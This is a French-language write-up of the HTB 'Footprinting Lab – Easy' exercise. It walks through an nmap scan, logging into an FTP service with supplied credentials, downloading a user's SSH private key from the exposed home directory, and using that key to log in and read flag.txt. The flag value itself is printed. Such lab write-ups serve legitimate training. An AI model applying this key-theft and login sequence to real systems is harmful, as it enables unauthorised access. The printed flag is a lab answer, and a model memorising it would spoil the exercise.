Footprinting Lab – Easy
🎯 Objectif de la mission
Dans le cadre d’un audit de sécurité interne, la société Inlanefreight Ltd nous a mandatés pour effectuer un test de reconnaissance passive sur trois serveurs de leur infrastructure. Ce test est destiné à évaluer les risques liés à une mauvaise configuration ou à une exposition excessive d'informations sensibles. Aucune attaque intrusive ou exploitation active n’est autorisée.
Notre mission ici se concentre sur le premier serveur identifié comme un serveur DNS interne. L’objectif est :
D’identifier toutes les informations disponibles via ce serveur (zonetransfer, informations de configuration, sous-domaines, etc.)
D’exploiter ces données pour comprendre les éventuelles failles ou vecteurs d’attaque
De récupérer le contenu du fichier
flag.txt
présent sur la machine cible
📄 Informations
Le serveur DNS est exposé sur le réseau interne.
Des identifiants ont été récupérés :
ceil:qwer1234
Des discussions en interne évoquent l’usage de clés SSH par certains employés.
L’usage d’exploits ou de techniques agressives est strictement interdit.
Enumerate the server carefully and find the flag.txt file. Submit the contents of this file as the answer.
Scan TCP de la cible :
$ nmap -A -T5 -p- -oN TCP_Easy 10.129.84.241
PORT STATE SERVICE VERSION
21/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (ftp.int.inlanefreight.htb) [10.129.84.241]
| NULL:
|_ 220 ProFTPD Server (ftp.int.inlanefreight.htb) [10.129.84.241]
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
2121/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (Ceil's FTP) [10.129.84.241]
| NULL:
|_ 220 ProFTPD Server (Ceil's FTP) [10.129.84.241]
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
On observe alors 2 services FTP actifs :
21/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (ftp.int.inlanefreight.htb) [10.129.84.241]
[...]
2121/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (Ceil's FTP) [10.129.84.241]
On se connecte au FTP de ceil avec ses identifiants (ceil:qwer1234) :
$ ftp ceil@10.129.84.19 2121
Connected to 10.129.84.19.
220 ProFTPD Server (Ceil's FTP) [10.129.84.19]
331 Password required for ceil
Password:
230 User ceil logged in
Remote system type is UNIX.
Using binary mode to transfer files.
Nous listons son répertoire actuel :
ftp> ls -al
229 Entering Extended Passive Mode (|||31588|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 .
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 ..
-rw------- 1 ceil ceil 294 Nov 10 2021 .bash_history
-rw-r--r-- 1 ceil ceil 220 Nov 10 2021 .bash_logout
-rw-r--r-- 1 ceil ceil 3771 Nov 10 2021 .bashrc
drwx------ 2 ceil ceil 4096 Nov 10 2021 .cache
-rw-r--r-- 1 ceil ceil 807 Nov 10 2021 .profile
drwx------ 2 ceil ceil 4096 Nov 10 2021 .ssh
-rw------- 1 ceil ceil 759 Nov 10 2021 .viminfo
On peut observer la présence du répertoire .ssh
. Nous nous y rendons pour récupérer la clé privée de connexion SSH :
ftp> cd .ssh
250 CWD command successful
ftp> pwd
Remote directory: /.ssh
ftp> ls -al
229 Entering Extended Passive Mode (|||24957|)
150 Opening ASCII mode data connection for file list
drwx------ 2 ceil ceil 4096 Nov 10 2021 .
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 ..
-rw-rw-r-- 1 ceil ceil 738 Nov 10 2021 authorized_keys
-rw------- 1 ceil ceil 3381 Nov 10 2021 id_rsa
-rw-r--r-- 1 ceil ceil 738 Nov 10 2021 id_rsa.pub
226 Transfer complete
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||2693|)
150 Opening BINARY mode data connection for id_rsa (3381 bytes)
100% |***********************************************************| 3381 4.70 MiB/s 00:00 ETA
226 Transfer complete
3381 bytes received in 00:00 (114.00 KiB/s)
Une fois téléchargé, nous appliquons à la clé privée les droits nécessaires avant de l'utiliser pour nous connecter à notre cible :
chmod 600 id_rsa # Attribution des droits pour le fichier id_rsa
$ ssh -i id_rsa ceil@10.129.84.19 # Utilisation de la clé privée pour la connexion
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-90-generic x86_64)
Last login: Fri Jun 27 07:18:40 2025 from 10.10.14.130
ceil@NIXEASY:~$
Nous avons maintenant accès à notre cible via SSH.
Une fois connectés, nous analysons l'ensemble de la machine pour trouver le fichier flag.txt :
ceil@NIXEASY:~$ ls ../
ceil cry0l1t3 flag
ceil@NIXEASY:~$ ls ../flag/
flag.txt
ceil@NIXEASY:~$ cat ../flag/flag.txt
HTB{7nrzise7hednrxihskjed7nzrgkweunj47zngrhdbkjhgdfbjkc7hgj}
Afin de trouver l'emplacement du fichier, nous pouvons également executer la commande suivante sur notre cible :
ceil@NIXEASY:~$ find / -type f -name "flag.txt" 2>/dev/null
/home/flag/flag.txt
Nous obtenons donc le flag de ce premier niveau :
HTB{7nrzise7hednrxihskjed7nzrgkweunj47zngrhdbkjhgdfbjkc7hgj}
Mis à jour